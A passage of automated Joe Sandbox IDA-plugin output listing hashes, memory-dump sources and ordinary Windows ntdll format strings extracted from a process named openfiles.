                                                                                                                                                  • Instruction Fuzzy Hash: AD51C7B6A00116BFDB20DF98899097EF7B8BB88604B14C579E495D7741E234FE60CBE1
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  • Opcode ID: 856ec430d95d3206e89cbb454a90ae00287cb13e775937af18983400dce3cefb
                                                                                                                                                  • Instruction ID: 6d4108a3ae1aa6105cd8b4840eb5788dd650c295aa7e9ffc3e4ccf0cb8d96cca
                                                                                                                                                  • Opcode Fuzzy Hash: 856ec430d95d3206e89cbb454a90ae00287cb13e775937af18983400dce3cefb
                                                                                                                                                  • Instruction Fuzzy Hash: C6513C72A006456FDB30DF5CC990A7FB7F8DF88204B1484A9E4D6E7651E6B8FA00C760
                                                                                                                                                  Strings
                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 049D4725
                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 049D4742
                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 049D4787
                                                                                                                                                  • ExecuteOptions, xrefs: 049D46A0
                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 049D4655
                                                                                                                                                  • Execute=1, xrefs: 049D4713
                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049D46FC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                  • Opcode ID: 18eb361314c168f908eb0f85492fcee61c21f785aeb5329e7d8bff072c60bad5
                                                                                                                                                  • Instruction ID: b98cdc7d1e035e7d64501880df18c2df36d0418bd7dfb12f4319cbc1deac2070
                                                                                                                                                  • Opcode Fuzzy Hash: 18eb361314c168f908eb0f85492fcee61c21f785aeb5329e7d8bff072c60bad5
                                                                                                                                                  • Instruction Fuzzy Hash: E251F431610219BBEF10AEE8DC89FAA77ECABC4304F0404F9E505AB180EB71BE41CE51
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                  • Instruction ID: 9153ae1d085a33a5b335aedd362f35783ea0ed15e9ad2e2b5530006d08069c77
                                                                                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                  • Instruction Fuzzy Hash: 2A81D230E052499EDF24CE68C8507FEBBB6AF85320F184639DA61A7691C770B860CBD1
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049D02E7
                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049D02BD
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 049D031E
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 049D7B7F
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 049D7BAC
                                                                                                                                                  • RTL: Resource at %p, xrefs: 049D7B8E
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049D728C
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 049D7294
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 049D72C1
                                                                                                                                                  • RTL: Resource at %p, xrefs: 049D72A3
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-
                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$@
                                                                                                                                                  • API String ID: 0-1194432280